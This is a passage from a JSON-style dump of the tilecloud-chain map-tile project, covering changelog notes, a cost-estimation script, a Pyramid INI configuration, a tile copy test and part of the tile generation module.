1. Support different geometries per layer; this requires configuration changes. Old version:\n\n   > ```yaml\n   > connection: user=www-data password=www-data dbname=<db> host=localhost\n   > sql: <column> AS geom FROM <table>\n   > ```\n   >\n   > New version:\n   >\n   > ```yaml\n   > connection: user=www-data password=www-data dbname=<db> host=localhost\n   > geoms:\n   >   - sql: <column> AS geom FROM <table>\n   > ```\n   >\n   > More information in the **Configure geom/sql** chapter.\n\n2. Update from `optparse` to `argparse`, with some argument refactoring; use `--help` to see the new version.\n3. Add support for Berkeley DB (`bsddb`).\n4. The tile `server` is completely rewritten; it now supports all caches, the `REST` and `KVP` interfaces\n   and `GetFeatureInfo` requests, and it can be used as a Pyramid view or as a `WSGI` server. More\n   information in the **Distribute the tiles** chapter.\n5. Add three strategies to bypass the proxy/cache: use the headers `Cache-Control: no-cache, no-store` and\n   `Pragma: no-cache` (default); use localhost in the URL and the header `Host: <host_name>` (recommended);\n   add a random `SALT` argument (if the above don't work). More information in the **Proxy/cache issue**\n   chapter.\n6. Improve the dimensions usage by adding them to the WMS requests, and add a `--dimensions` argument to\n   `generate_tiles` to change the dimension values.\n7. Extract generate_cost and generate_amazon from generate_controller.\n8. Now we can create legends; see the **Legends** chapter.\n9. Now the tile generation displays generation statistics at the end.\n10. The EC2 configuration is moved into a separate structure; see the README for more information.\n\n## Release 0.6\n\n1. Now the Apache configuration can be generated with\n   `.build/venv/bin/generate_controller --generate-apache-config`; it supports the `filesystem` cache and\n   `MapCache`.\n2. Windows fixes.\n3. Use console rewrite (carriage return) to log generated tile coordinates.\n4. Now if no layer is specified in `generation:default_layers`, we generate all layers by default.\n5. Now the bbox coordinates can be floats.\n6. New `--get-bbox` option to get the bbox of a tile.\n7. Add coveralls support (<https://coveralls.io/r/camptocamp/tilecloud-chain>).\n8. Add a config option `generation:error_file` and a command option `--tiles` to store and regenerate\n   errored tiles.\n\n## Release 0.5\n\n1. SQS config change:\n\n```yaml\nlayers:\n  layer_name:\n    sqs:\n      # The region where the SQS queue is\n      region: eu-west-1\n      # The SQS queue name; it should already exist\n      queue: the_name\n```\n\n2. Add a debug option (`--debug`); please use it to report issues.\n
3. Now the `sql` request can return a set of geometries in a column named geom, but the syntax changes a\n   little bit => `<column> AS geom FROM <table>`\n" }, { "alpha_fraction": 0.5258588790893555, "alphanum_fraction": 0.5388189554214478, "avg_line_length": 37.76303482055664, "blob_id": "f9222f65ae95995c14c7be580060804aff982956", "content_id": "0b2822ad64aa44ce0e4113d2c0c56905b921660e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8179, "license_type": "permissive", "max_line_length": 108, "num_lines": 211, "path": "/tilecloud_chain/cost.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import logging\nimport sys\nfrom argparse import ArgumentParser, Namespace\nfrom datetime import timedelta\nfrom typing import Iterable, Iterator, Optional, Tuple\n\nfrom tilecloud import Tile, TileStore\nfrom tilecloud_chain import Run, TileGeneration, add_common_options\nfrom tilecloud_chain.format import duration_format\n\nlogger = logging.getLogger(__name__)\n\n\ndef main() -> None:\n    \"\"\"Calculate the cost, main function.\"\"\"\n    try:\n        parser = ArgumentParser(description=\"Used to calculate the generation cost\", prog=sys.argv[0])\n        add_common_options(parser, tile_pyramid=False, dimensions=True)\n        parser.add_argument(\n            \"--cost-algo\",\n            \"--calculate-cost-algorithm\",\n            default=\"area\",\n            dest=\"cost_algo\",\n            choices=(\"area\", \"count\"),\n            help=\"The algorithm used to calculate the cost, by default based on the 'area' \"\n            \"of the generation geometry; can also be 'count', based on the number of tiles to generate.\",\n        )\n\n        options = parser.parse_args()\n        gene = TileGeneration(\n            options.config,\n            options=options,\n            layer_name=options.layer,\n            base_config={\"cost\": {}},\n            multi_thread=False,\n        )\n        config = gene.get_config(options.config)\n\n        all_size: float = 0\n        tile_size: float = 0\n        all_tiles = 0\n        if options.layer:\n            layer = config.config[\"layers\"][options.layer]\n            (all_size, all_time, all_price, all_tiles) = _calculate_cost(gene, options.layer, options)\n            tile_size = layer[\"cost\"][\"tile_size\"] / (1024.0 * 1024)\n        else:\n            all_time = timedelta()\n            all_price = 0\n            for layer_name in gene.get_config(options.config).config[\"generation\"][\"default_layers\"]:\n                print()\n                print(f\"===== {layer_name} =====\")\n                layer = config.config[\"layers\"][layer_name]\n                gene.create_log_tiles_error(layer_name)\n                (size, time, price, tiles) = _calculate_cost(gene, layer_name, options)\n                tile_size += layer[\"cost\"][\"tile_size\"] / (1024.0 * 1024)\n                all_time += time\n                all_price += price\n                all_size += size\n                all_tiles += tiles\n\n            print()\n            print(\"===== GLOBAL =====\")\n            print(f\"Total number of tiles: {all_tiles}\")\n            print(f\"Total generation time: {duration_format(all_time)} [d h:mm:ss]\")\n            print(f\"Total generation cost: {all_price:0.2f} [$]\")\n        print()\n        s3_cost = all_size * gene.get_main_config().config[\"cost\"][\"s3\"][\"storage\"] / (1024.0 * 1024 * 1024)\n        print(f\"S3 Storage: {s3_cost:0.2f} [$/month]\")\n        s3_get_cost = (\n            gene.get_main_config().config[\"cost\"][\"s3\"][\"get\"]\n            * config.config[\"cost\"][\"request_per_layers\"]\n            / 10000.0\n            + gene.get_main_config().config[\"cost\"][\"s3\"][\"download\"]\n            * config.config[\"cost\"][\"request_per_layers\"]\n            * tile_size\n        )\n        print(f\"S3 get: {s3_get_cost:0.2f} [$/month]\")\n        # if 'cloudfront' in gene.config['cost']:\n        #     print('CloudFront: %0.2f [$/month]' % ()\n        #     
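The CloudFront estimate was left disabled upstream; if re-enabled it would\n        #     presumably mirror the S3 'get' formula above (a per-request fee plus a\n        #     download cost proportional to the tile size):\n        #     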
gene.config['cost']['request_per_layers'] / 10000.0 +\n # gene.config['cost']['cloudfront']['download'] *\n # gene.config['cost']['request_per_layers'] * tile_size)\n except SystemExit:\n raise\n except: # pylint: disable=bare-except\n logger.exception(\"Exit with exception\")\n sys.exit(1)\n\n\ndef _calculate_cost(\n gene: TileGeneration, layer_name: str, options: Namespace\n) -> Tuple[float, timedelta, float, int]:\n nb_metatiles = {}\n nb_tiles = {}\n config = gene.get_config(options.config)\n layer = config.config[\"layers\"][layer_name]\n\n meta = layer[\"meta\"]\n if options.cost_algo == \"area\":\n tile_size = config.config[\"grids\"][layer[\"grid\"]][\"tile_size\"]\n for zoom, resolution in enumerate(config.config[\"grids\"][layer[\"grid\"]][\"resolutions\"]):\n if \"min_resolution_seed\" in layer and resolution < layer[\"min_resolution_seed\"]:\n continue\n\n print(f\"Calculate zoom {zoom}.\")\n\n px_buffer = layer[\"px_buffer\"] + layer[\"meta_buffer\"] if meta else 0\n m_buffer = px_buffer * resolution\n if meta:\n size = tile_size * layer[\"meta_size\"] * resolution\n meta_buffer = size * 0.7 + m_buffer\n meta_geom = gene.get_geoms(config, layer_name)[zoom].buffer(meta_buffer, 1)\n nb_metatiles[zoom] = int(round(meta_geom.area / size**2))\n size = tile_size * resolution\n tile_buffer = size * 0.7 + m_buffer\n geom = gene.get_geoms(config, layer_name)[zoom].buffer(tile_buffer, 1)\n nb_tiles[zoom] = int(round(geom.area / size**2))\n\n elif options.cost_algo == \"count\":\n gene.init_tilecoords(config, layer_name)\n gene.add_geom_filter()\n\n if meta:\n\n def count_metatile(tile: Tile) -> Tile:\n if tile:\n if tile.tilecoord.z in nb_metatiles:\n nb_metatiles[tile.tilecoord.z] += 1\n else:\n nb_metatiles[tile.tilecoord.z] = 1\n return tile\n\n gene.imap(count_metatile)\n\n class MetaTileSplitter(TileStore):\n \"\"\"Convert the metatile flow to tile flow.\"\"\"\n\n def get(self, tiles: Iterable[Optional[Tile]]) -> Iterator[Tile]:\n assert tiles is not None\n for metatile in tiles:\n assert metatile is not None\n for tilecoord in metatile.tilecoord:\n yield Tile(tilecoord)\n\n gene.add_metatile_splitter(MetaTileSplitter())\n\n # Only keep tiles that intersect geometry\n gene.add_geom_filter()\n\n def count_tile(tile: Tile) -> Tile:\n if tile:\n if tile.tilecoord.z in nb_tiles:\n nb_tiles[tile.tilecoord.z] += 1\n else:\n print(f\"Calculate zoom {tile.tilecoord.z}.\")\n nb_tiles[tile.tilecoord.z] = 1\n return tile\n\n gene.imap(count_tile)\n\n run = Run(gene, gene.functions_metatiles)\n assert gene.tilestream\n for tile in gene.tilestream:\n tile.metadata[\"layer\"] = layer_name\n run(tile)\n\n times = {}\n print()\n for z, nb_metatile in nb_metatiles.items():\n print(f\"{nb_metatile} meta tiles in zoom {z}.\")\n times[z] = layer[\"cost\"][\"metatile_generation_time\"] * nb_metatile\n\n price: float = 0\n all_size: float = 0\n all_time: float = 0\n all_tiles = 0\n for z, nb_tile in nb_tiles.items():\n print()\n print(f\"{nb_tile} tiles in zoom {z}.\")\n all_tiles += nb_tile\n if meta:\n time = times[z] + layer[\"cost\"][\"tile_generation_time\"] * nb_tile\n else:\n time = layer[\"cost\"][\"tileonly_generation_time\"] * nb_tile\n size = layer[\"cost\"][\"tile_size\"] * nb_tile\n all_size += size\n\n all_time += time\n td = timedelta(milliseconds=time)\n print(f\"Time to generate: {duration_format(td)} [d h:mm:ss]\")\n c = gene.get_main_config().config[\"cost\"][\"s3\"][\"put\"] * nb_tile / 1000.0\n price += c\n print(f\"S3 PUT: {c:0.2f} [$]\")\n\n if \"sqs\" in 
gene.get_main_config().config:\n if meta:\n nb_sqs = nb_metatiles[z] * 3\n else:\n nb_sqs = nb_tile * 3\n c = nb_sqs * gene.get_main_config().config[\"cost\"][\"sqs\"][\"request\"] / 1000000.0\n price += c\n print(f\"SQS usage: {c:0.2f} [$]\")\n\n print()\n td = timedelta(milliseconds=all_time)\n print(f\"Number of tiles: {all_tiles}\")\n print(f\"Generation time: {duration_format(td)} [d h:mm:ss]\")\n print(f\"Generation cost: {price:0.2f} [$]\")\n\n return all_size, td, price, all_tiles\n" }, { "alpha_fraction": 0.7332921028137207, "alphanum_fraction": 0.7456682920455933, "avg_line_length": 19.71794891357422, "blob_id": "d36ba0768f786d9ec76e5be460715042d0975f1b", "content_id": "23a58343a3ef25899d6a7c5a1630155e78a904b4", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 1616, "license_type": "permissive", "max_line_length": 84, "num_lines": 78, "path": "/development.ini", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "###\n# app configuration\n# http://docs.pylonsproject.org/projects/pyramid/en/1.6-branch/narr/environment.html\n###\n\n[app:app]\nuse = egg:tilecloud-chain\nfilter-with = proxy-prefix\n\npyramid.reload_templates = %(DEVELOPMENT)s\npyramid.debug_authorization = %(DEVELOPMENT)s\npyramid.debug_notfound = %(DEVELOPMENT)s\npyramid.debug_routematch = %(DEVELOPMENT)s\npyramid.debug_templates = %(DEVELOPMENT)s\npyramid.default_locale_name = en\n\nc2c.base_path = /c2c\n\ntilegeneration_configfile = %(TILEGENERATION_CONFIGFILE)s\n\n[pipeline:main]\npipeline = egg:c2cwsgiutils#client_info egg:c2cwsgiutils#sentry app\n\n[filter:proxy-prefix]\nuse = egg:PasteDeploy#prefix\nprefix = %(VISIBLE_ENTRY_POINT)s\n\n[server:main]\nuse = egg:waitress#main\nlisten = *:8080\n\n###\n# logging configuration\n# http://docs.pylonsproject.org/projects/pyramid/en/1.6-branch/narr/logging.html\n###\n\n[loggers]\nkeys = root, c2cwsgi, tilecloud, tilecloud_chain\n\n[handlers]\nkeys = console, json\n\n[formatters]\nkeys = generic\nformat = %(levelname)-5.5s [%(name)s] %(message)s\n\n[logger_root]\nlevel = %(OTHER_LOG_LEVEL)s\nhandlers = %(LOG_TYPE)s\n\n[logger_tilecloud]\nlevel = %(TILECLOUD_LOG_LEVEL)s\nhandlers =\nqualname = tilecloud\n\n[logger_tilecloud_chain]\nlevel = %(TILECLOUD_CHAIN_LOG_LEVEL)s\nhandlers =\nqualname = tilecloud_chain\n\n[logger_c2cwsgi]\nlevel = %(C2CWSGIUTILS_LOG_LEVEL)s\nhandlers =\nqualname = c2cwsgiutils\n\n[handler_console]\nclass = StreamHandler\nargs = (sys.stdout,)\nlevel = NOTSET\nformatter = generic\n\n[formatter_generic]\nformat = %(levelname)-5.5s %(name)s %(message)s\n\n[handler_json]\nclass = tilecloud_chain.JsonLogHandler\nargs = (sys.stdout,)\nlevel = NOTSET\n" }, { "alpha_fraction": 0.500330924987793, "alphanum_fraction": 0.5539377927780151, "avg_line_length": 32.57777786254883, "blob_id": "bce676807335487dc58aa251366978255fee945a", "content_id": "dd8ea63d3eaae20907947a7e95933c18721356a9", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3022, "license_type": "permissive", "max_line_length": 98, "num_lines": 90, "path": "/tilecloud_chain/tests/test_copy.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import os\nimport shutil\n\nimport requests\n\nfrom tilecloud_chain import copy_\nfrom tilecloud_chain.tests import CompareCase\n\n\nclass TestGenerate(CompareCase):\n def setUp(self) -> None: # noqa\n self.maxDiff = None\n\n @classmethod\n def setUpClass(cls): # noqa\n 
os.chdir(os.path.dirname(__file__))\n if os.path.exists(\"/tmp/tiles\"):\n shutil.rmtree(\"/tmp/tiles\")\n os.makedirs(\"/tmp/tiles/src/1.0.0/point_hash/default/21781/0/0/\")\n\n @classmethod\n def tearDownClass(cls): # noqa\n os.chdir(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))\n if os.path.exists(\"/tmp/tiles\"):\n shutil.rmtree(\"/tmp/tiles\")\n\n def test_copy(self) -> None:\n with open(\"/tmp/tiles/src/1.0.0/point_hash/default/21781/0/0/0.png\", \"w\") as f:\n f.write(\"test image\")\n\n for d in (\"-d\", \"-q\", \"-v\"):\n self.assert_cmd_equals(\n cmd=f\".build/venv/bin/generate_copy {d} -c tilegeneration/test-copy.yaml src dst\",\n main_func=copy_.main,\n regex=True,\n expected=\"\"\"The tile copy of layer 'point_hash' is finish\nNb copy tiles: 1\nNb errored tiles: 0\nNb dropped tiles: 0\nTotal time: 0:00:[0-9][0-9]\nTotal size: 10 o\nTime per tile: [0-9]+ ms\nSize per tile: 10(.0)? o\n\n\"\"\"\n if d != \"-q\"\n else \"\",\n empty_err=True,\n )\n with open(\"/tmp/tiles/dst/1.0.0/point_hash/default/21781/0/0/0.png\") as f:\n self.assertEqual(f.read(), \"test image\")\n\n def test_process(self) -> None:\n for d in (\"-vd\", \"-q\", \"-v\", \"\"):\n response = requests.get(\n \"http://mapserver:8080/mapserv?STYLES=default&SERVICE=WMS&FORMAT=\\\nimage%2Fpng&REQUEST=GetMap&HEIGHT=256&WIDTH=256&VERSION=1.1.1&BBOX=\\\n%28560800.0%2C+158000.0%2C+573600.0%2C+170800.0%29&LAYERS=point&SRS=EPSG%3A21781\"\n )\n response.raise_for_status()\n with open(\"/tmp/tiles/src/1.0.0/point_hash/default/21781/0/0/0.png\", \"wb\") as out:\n out.write(response.content)\n statinfo = os.stat(\n \"/tmp/tiles/src/1.0.0/point_hash/default/21781/0/0/0.png\",\n )\n self.assertEqual(statinfo.st_size, 755)\n\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_process {} -c \"\n \"tilegeneration/test-copy.yaml --cache src optipng\".format(d),\n main_func=copy_.process,\n regex=True,\n expected=\"\"\"The tile process of layer 'point_hash' is finish\nNb process tiles: 1\nNb errored tiles: 0\nNb dropped tiles: 0\nTotal time: 0:00:[0-9][0-9]\nTotal size: 103 o\nTime per tile: [0-9]+ ms\nSize per tile: 103(.0)? 
o\n\n\"\"\"\n if d != \"-q\"\n else \"\",\n empty_err=True,\n )\n statinfo = os.stat(\n \"/tmp/tiles/src/1.0.0/point_hash/default/21781/0/0/0.png\",\n )\n self.assertEqual(statinfo.st_size, 103)\n" }, { "alpha_fraction": 0.5345144867897034, "alphanum_fraction": 0.5380809903144836, "avg_line_length": 39.743751525878906, "blob_id": "af11f1aabc0ebb401e7cc71d3f85a559243b25c9", "content_id": "046d891946a23e9aafd0de7b65052231ce555f3b", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 26076, "license_type": "permissive", "max_line_length": 125, "num_lines": 640, "path": "/tilecloud_chain/generate.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import logging\nimport os\nimport random\nimport socket\nimport sys\nimport threading\nfrom argparse import ArgumentParser, Namespace\nfrom datetime import datetime\nfrom getpass import getuser\nfrom typing import IO, Callable, List, Optional, cast\n\nimport boto3\nimport prometheus_client\n\nimport tilecloud.filter.error\nimport tilecloud_chain\nfrom tilecloud import Tile, TileCoord, TileStore\nfrom tilecloud.filter.logger import Logger\nfrom tilecloud.layout.wms import WMSTileLayout\nfrom tilecloud.store.url import URLTileStore\nfrom tilecloud_chain import (\n Count,\n CountSize,\n HashDropper,\n HashLogger,\n LocalProcessFilter,\n MultiAction,\n TileGeneration,\n TilesFileStore,\n add_common_options,\n get_queue_store,\n parse_tilecoord,\n quote,\n)\nfrom tilecloud_chain.database_logger import DatabaseLogger, DatabaseLoggerInit\nfrom tilecloud_chain.format import default_int, duration_format, size_format\nfrom tilecloud_chain.multitilestore import MultiTileStore\nfrom tilecloud_chain.timedtilestore import TimedTileStoreWrapper\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass LogTilesContext:\n \"\"\"Logging tile context.\"\"\"\n\n def __init__(self, gene: TileGeneration):\n self.gene = gene\n\n def __call__(self, tile: Tile) -> Tile:\n tilecloud_chain.LOGGING_CONTEXT.setdefault(os.getpid(), {})[threading.current_thread().native_id] = { # type: ignore\n \"host\": tile.metadata.get(\"host\"),\n \"layer\": tile.metadata.get(\"layer\"),\n \"meta_tilecoord\": str(tile.tilecoord),\n }\n\n return tile\n\n\nclass Generate:\n \"\"\"Generate the tiles, generate the queue, ...\"\"\"\n\n def __init__(\n self, options: Namespace, gene: TileGeneration, out: Optional[IO[str]], server: bool = False\n ) -> None:\n self._count_metatiles: Optional[Count] = None\n self._count_metatiles_dropped: Optional[Count] = None\n self._count_tiles: Optional[Count] = None\n self._count_tiles_dropped: Optional[Count] = None\n self._count_tiles_stored: Optional[CountSize] = None\n self._queue_tilestore: Optional[TileStore] = None\n self._cache_tilestore: Optional[TileStore] = None\n self._options = options\n self._gene = gene\n self.out = out\n\n if getattr(self._options, \"get_hash\", None) is not None:\n self._options.role = \"hash\"\n self._options.test = 1\n\n if getattr(self._options, \"tiles\", None) is not None:\n self._options.role = \"slave\"\n\n self._generate_init()\n if self._options.role != \"master\" and not server:\n self._generate_tiles()\n\n def gene(self, layer_name: Optional[str] = None) -> None:\n if self._count_tiles is not None:\n self._count_tiles.nb = 0\n if self._count_tiles_dropped is not None:\n self._count_tiles_dropped.nb = 0\n if self._count_tiles_stored is not None:\n self._count_tiles_stored.nb = 0\n self._count_tiles_stored.size = 0\n if 
self._count_metatiles is not None:\n self._count_metatiles.nb = 0\n if self._count_metatiles_dropped is not None:\n self._count_metatiles_dropped.nb = 0\n self._gene.error = 0\n\n if self._options.role != \"slave\" and not self._options.get_hash and not self._options.get_bbox:\n assert layer_name\n self._gene.create_log_tiles_error(layer_name)\n\n if self._options.role != \"slave\" or self._options.tiles:\n self._generate_queue(layer_name)\n\n self.generate_consume()\n self.generate_resume(layer_name)\n\n def _generate_init(self) -> None:\n if self._options.role != \"server\":\n self._count_metatiles_dropped = Count()\n self._count_tiles = Count()\n self._count_tiles_dropped = Count()\n\n if self._options.role in (\"master\", \"slave\") and not self._options.tiles:\n self._queue_tilestore = get_queue_store(self._gene.get_main_config(), self._options.daemon)\n\n if self._options.role in (\"local\", \"master\"):\n self._gene.add_geom_filter()\n\n if self._options.role in (\"local\", \"master\") and \"logging\" in self._gene.get_main_config().config:\n self._gene.imap(\n DatabaseLoggerInit(\n self._gene.get_main_config().config[\"logging\"],\n self._options is not None and self._options.daemon,\n )\n )\n\n if self._options.local_process_number is not None:\n self.add_local_process_filter()\n\n # At this stage, the tilestream contains metatiles that intersect geometry\n self._gene.add_logger()\n\n if self._options.role == \"master\":\n assert self._queue_tilestore is not None\n # Put the metatiles into the SQS or Redis queue\n self._gene.put(self._queue_tilestore)\n self._count_tiles = self._gene.counter()\n\n if self._options.role in (\"local\", \"slave\"):\n self._cache_tilestore = self._gene.get_tilesstore()\n assert self._cache_tilestore is not None\n\n def add_local_process_filter(self) -> None:\n self._gene.imap(\n LocalProcessFilter(\n self._gene.get_main_config().config[\"generation\"][\"number_process\"],\n self._options.local_process_number,\n )\n )\n\n def _generate_queue(self, layer_name: Optional[str]) -> None:\n if self._options.tiles:\n self._gene.set_store(TilesFileStore(self._options.tiles))\n return\n\n assert layer_name is not None\n assert self._gene.config_file is not None\n config = self._gene.get_config(self._gene.config_file)\n layer = config.config[\"layers\"][layer_name]\n\n if self._options.get_bbox:\n try:\n tilecoord = parse_tilecoord(self._options.get_bbox)\n bounds = default_int(self._gene.get_grid(config, layer[\"grid\"]).extent(tilecoord))\n print(f\"Tile bounds: [{','.join([str(b) for b in bounds])}]\", file=self.out)\n sys.exit()\n except ValueError:\n _LOGGER.exception(\n \"Tile '%s' is not in the format 'z/x/y' or z/x/y:+n/+n\",\n self._options.get_bbox,\n )\n sys.exit(1)\n\n if self._options.role in (\"local\", \"master\"):\n # Generate a stream of metatiles\n self._gene.init_tilecoords(config, layer_name)\n\n elif self._options.role == \"hash\":\n layer = config.config[\"layers\"][layer_name]\n try:\n z, x, y = (int(v) for v in self._options.get_hash.split(\"/\"))\n if layer.get(\"meta\"):\n self._gene.set_tilecoords(config, [TileCoord(z, x, y, layer[\"meta_size\"])], layer_name)\n else:\n self._gene.set_tilecoords(config, [TileCoord(z, x, y)], layer_name)\n except ValueError:\n _LOGGER.exception(\"Tile '%s' is not in the format 'z/x/y'\", self._options.get_hash)\n sys.exit(1)\n\n def _generate_tiles(self) -> None:\n if self._options.role in (\"slave\") and not self._options.tiles:\n assert self._queue_tilestore is not None\n # Get the metatiles from the 
SQS/Redis queue\n self._gene.set_store(self._queue_tilestore)\n self._gene.imap(lambda tile: tile if \"layer\" in tile.metadata else None)\n self._gene.imap(LogTilesContext(self._gene))\n\n if self._options.role != \"server\":\n self._count_metatiles = self._gene.counter()\n\n self._gene.get(\n TimedTileStoreWrapper(\n MultiTileStore(TilestoreGetter(self)),\n store_name=\"get\",\n ),\n \"Get tile\",\n )\n\n if self._options.role in (\"local\", \"slave\") and \"logging\" in self._gene.get_main_config().config:\n self._gene.imap(\n DatabaseLogger(\n self._gene.get_main_config().config[\"logging\"],\n self._options is not None and self._options.daemon,\n )\n )\n self._gene.init(\n self._queue_tilestore\n if \"error_file\" in self._gene.get_main_config().config[\"generation\"]\n else None,\n self._options.daemon,\n )\n else:\n self._gene.init(daemon=self._options.daemon)\n\n if self._options.role == \"hash\":\n self._gene.imap(HashLogger(\"empty_metatile_detection\", self.out))\n elif not self._options.near:\n assert self._count_metatiles_dropped is not None\n self._gene.imap(MultiAction(HashDropperGetter(self, True, self._count_metatiles_dropped)))\n\n def add_elapsed_togenerate(metatile: Tile) -> Optional[Tile]:\n if metatile is not None:\n metatile.elapsed_togenerate = metatile.tilecoord.n**2 # type: ignore\n return metatile\n return None\n\n self._gene.imap(add_elapsed_togenerate)\n\n # Split the metatile image into individual tiles\n self._gene.add_metatile_splitter()\n self._gene.imap(Logger(_LOGGER, logging.INFO, \"%(tilecoord)s, %(formated_metadata)s\"))\n\n if self._count_tiles is not None:\n self._gene.imap(self._count_tiles)\n\n self._gene.process(key=\"pre_hash_post_process\")\n\n if self._options.role == \"hash\":\n self._gene.imap(HashLogger(\"empty_tile_detection\", self.out))\n elif not self._options.near:\n assert self._count_tiles_dropped is not None\n self._gene.imap(MultiAction(HashDropperGetter(self, False, self._count_tiles_dropped)))\n\n if self._options.role != \"server\":\n self._gene.process()\n\n if self._options.role in (\"local\", \"slave\"):\n self._count_tiles_stored = self._gene.counter_size()\n\n if self._options.time:\n\n def log_size(tile: Tile) -> Tile:\n assert tile.data is not None\n sys.stdout.write(f\"size: {len(tile.data)}\\n\")\n return tile\n\n self._gene.imap(log_size)\n\n assert self._cache_tilestore is not None\n self._gene.put(self._cache_tilestore, \"Store the tile\")\n\n if self._options.role == \"slave\" and not self._options.tiles:\n\n def delete_from_store(tile: Tile) -> Tile:\n assert self._queue_tilestore is not None\n if hasattr(tile, \"metatile\"):\n metatile: Tile = tile.metatile\n metatile.elapsed_togenerate -= 1 # type: ignore\n if metatile.elapsed_togenerate == 0: # type: ignore\n self._queue_tilestore.delete_one(metatile)\n else:\n self._queue_tilestore.delete_one(tile)\n return tile\n\n self._gene.imap(delete_from_store)\n\n if self._options.role in (\"local\", \"slave\") and \"logging\" in self._gene.get_main_config().config:\n self._gene.imap(\n DatabaseLogger(\n self._gene.get_main_config().config[\"logging\"],\n self._options is not None and self._options.daemon,\n )\n )\n self._gene.init(daemon=self._options.daemon)\n\n def generate_consume(self) -> None:\n if self._options.time is not None:\n options = self._options\n\n class LogTime:\n \"\"\"Log the generation time.\"\"\"\n\n n = 0\n t1 = None\n\n def __call__(self, tile: Tile) -> Tile:\n self.n += 1\n assert options.time\n if self.n == options.time:\n self.t1 = 
datetime.now()\n elif self.n == 2 * options.time:\n t2 = datetime.now()\n assert self.t1\n duration = (t2 - self.t1) / options.time\n time = (\n duration.days * 24 * 3600 + duration.seconds\n ) * 1000000 + duration.microseconds\n sys.stdout.write(f\"time: {time}\\n\")\n return tile\n\n self._gene.imap(LogTime())\n\n self._gene.consume(self._options.time * 3)\n else:\n self._gene.consume()\n\n def generate_resume(self, layer_name: Optional[str]) -> None:\n config = self._gene.get_config(self._gene.config_file) if self._gene.config_file is not None else None\n if self._options.time is None:\n layer = None\n if layer_name is not None:\n assert config is not None\n layer = config.config[\"layers\"][layer_name]\n all_dimensions = self._gene.get_all_dimensions(layer)\n formated_dimensions = \" - \".join(\n [\", \".join([\"=\".join(d) for d in dimensions.items()]) for dimensions in all_dimensions]\n )\n suffix = (\n \"\"\n if ((len(all_dimensions) == 1 and len(all_dimensions[0]) == 0) or layer[\"type\"] != \"wms\")\n else f\" ({formated_dimensions})\"\n )\n message = [f\"The tile generation of layer '{layer_name}{suffix}' is finish\"]\n else:\n message = [\"The tile generation is finish\"]\n if self._options.role == \"master\":\n assert self._count_tiles\n message.append(f\"Nb of generated jobs: {self._count_tiles.nb}\")\n elif layer.get(\"meta\") if layer is not None else self._options.role == \"slave\":\n assert self._count_metatiles is not None\n assert self._count_metatiles_dropped is not None\n message += [\n f\"Nb generated metatiles: {self._count_metatiles.nb}\",\n f\"Nb metatiles dropped: {self._count_metatiles_dropped.nb}\",\n ]\n\n if self._options.role != \"master\":\n assert self._count_tiles is not None\n assert self._count_tiles_dropped is not None\n message += [\n f\"Nb generated tiles: {self._count_tiles.nb}\",\n f\"Nb tiles dropped: {self._count_tiles_dropped.nb}\",\n ]\n if self._options.role in (\"local\", \"slave\"):\n assert self._count_tiles_stored is not None\n assert self._count_tiles is not None\n message += [\n f\"Nb tiles stored: {self._count_tiles_stored.nb}\",\n f\"Nb tiles in error: {self._gene.error}\",\n f\"Total time: {duration_format(self._gene.duration)}\",\n ]\n if self._count_tiles_stored.nb != 0:\n message.append(f\"Total size: {size_format(self._count_tiles_stored.size)}\")\n if self._count_tiles.nb != 0:\n message.append(\n \"Time per tile: \"\n f\"{(self._gene.duration / self._count_tiles.nb * 1000).seconds:0.0f} ms\"\n )\n if self._count_tiles_stored.nb != 0:\n message.append(\n \"Size per tile: \"\n f\"{self._count_tiles_stored.size / self._count_tiles_stored.nb:0.0f} o\"\n )\n\n if not self._options.quiet and self._options.role in (\"local\", \"slave\", \"master\") and message:\n print(\"\\n\".join(message) + \"\\n\", file=self.out)\n\n if self._cache_tilestore is not None and hasattr(self._cache_tilestore, \"connection\"):\n self._cache_tilestore.connection.close()\n\n if (\n self._options.role != \"hash\"\n and self._options.time is None\n and config is not None\n and \"sns\" in config.config\n ):\n if \"region\" in config.config[\"sns\"]:\n sns_client = boto3.client(\"sns\", region_name=config.config[\"sns\"].get(\"region\", \"eu-west-1\"))\n else:\n sns_client = boto3.client(\"sns\")\n sns_message = [message[0]]\n sns_message += [\n f\"Layer: {layer_name if layer_name is not None else '(All layers)'}\",\n f\"Role: {self._options.role}\",\n f\"Host: {socket.getfqdn()}\",\n f\"Command: {' '.join([quote(arg) for arg in sys.argv])}\",\n ]\n sns_message 
+= message[1:]\n sns_client.publish(\n TopicArn=config.config[\"sns\"][\"topic\"],\n Message=\"\\n\".join(sns_message),\n Subject=f\"Tile generation ({layer_name if layer_name is not None else 'All layers'} - \"\n f\"{self._options.role})\",\n )\n\n\nclass TilestoreGetter:\n \"\"\"Used to get the correct tilestore based on the layername config file any layer type.\"\"\"\n\n def __init__(self, gene: Generate):\n self.gene = gene\n\n def __call__(self, config_file: str, layer_name: str) -> Optional[TileStore]:\n config = self.gene._gene.get_config(config_file)\n layer = config.config[\"layers\"][layer_name]\n if layer[\"type\"] == \"wms\":\n params = layer.get(\"params\", {}).copy()\n if \"STYLES\" not in params:\n params[\"STYLES\"] = \",\".join(layer[\"wmts_style\"] for _ in layer[\"layers\"].split(\",\"))\n if layer.get(\"generate_salt\", False):\n params[\"SALT\"] = str(random.randint(0, 999999)) # nosec\n\n # Get the metatile image from the WMS server\n return TimedTileStoreWrapper(\n URLTileStore(\n tilelayouts=(\n WMSTileLayout(\n url=layer[\"url\"],\n layers=layer[\"layers\"],\n srs=config.config[\"grids\"][layer[\"grid\"]][\"srs\"],\n format=layer[\"mime_type\"],\n border=layer[\"meta_buffer\"] if layer[\"meta\"] else 0,\n tilegrid=self.gene._gene.get_grid(config, 